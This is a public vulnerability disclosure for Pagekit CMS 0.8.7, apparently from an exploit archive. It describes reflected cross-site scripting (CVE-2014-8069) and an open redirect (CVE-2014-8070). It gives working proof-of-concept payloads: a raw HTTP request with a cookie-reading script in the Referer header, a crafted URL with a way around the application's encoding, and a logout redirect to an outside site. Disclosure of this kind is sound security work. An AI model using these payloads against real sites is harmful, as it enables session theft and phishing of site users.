# Exploit Title: Pagekit 0.8.7 Multiple Vulnerabilities
# Date: 13-10-2014
# Remote: Yes
# Exploit Author: Mahendra
# Vendor Homepage: http://www.pagekit.com/
# Version: 0.8.7
# Tested on: Windows XP SP 3 with WAMP Server 2.4
The latest Pagekit (0.8.7) CMS was found to be vulnerable with multiple reflected cross-site scripting because the application did not properly validate user input.
Pagekit is a modular and lightweight CMS built from the ground up with modern technologies like Symfony components and Doctrine. It will have a build-in marketplace to provide an awesome platform for theme and extension developers. Pagekit will be MIT licensed and hosted on GitHub.
-------------------------------------------------------------------
Reflected cross-site scripting (CVE-2014-8069)
-------------------------------------------------------------------
Referer HTTP Header
--------------------
GET /pagekit-0.8.7/index.php/user HTTP/1.1
Host: localhost
Referer: <ScRiPt>alert(document.cookie)</ScRiPt>
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: pagekit_session=unl3outg9eufv7fs7juq1ui1m6
Connection: keep-alive
Cache-Control: max-age=0
Arbitrary URL
--------------------
The application will encode the URL entered by the user below. However, this can be easily bypassed with proxy and modify the URL back to original state.
http://localhost/pagekit-0.8.7/index.php/1<ScRiPt>alert(document.cookie)</ScRiPt>
-------------------------------------------------------------------
Open redirection (CVE-2014-8070)
-------------------------------------------------------------------
http://localhost/pagekit-0.8.7/index.php/user/logout?redirect=http://www.google.com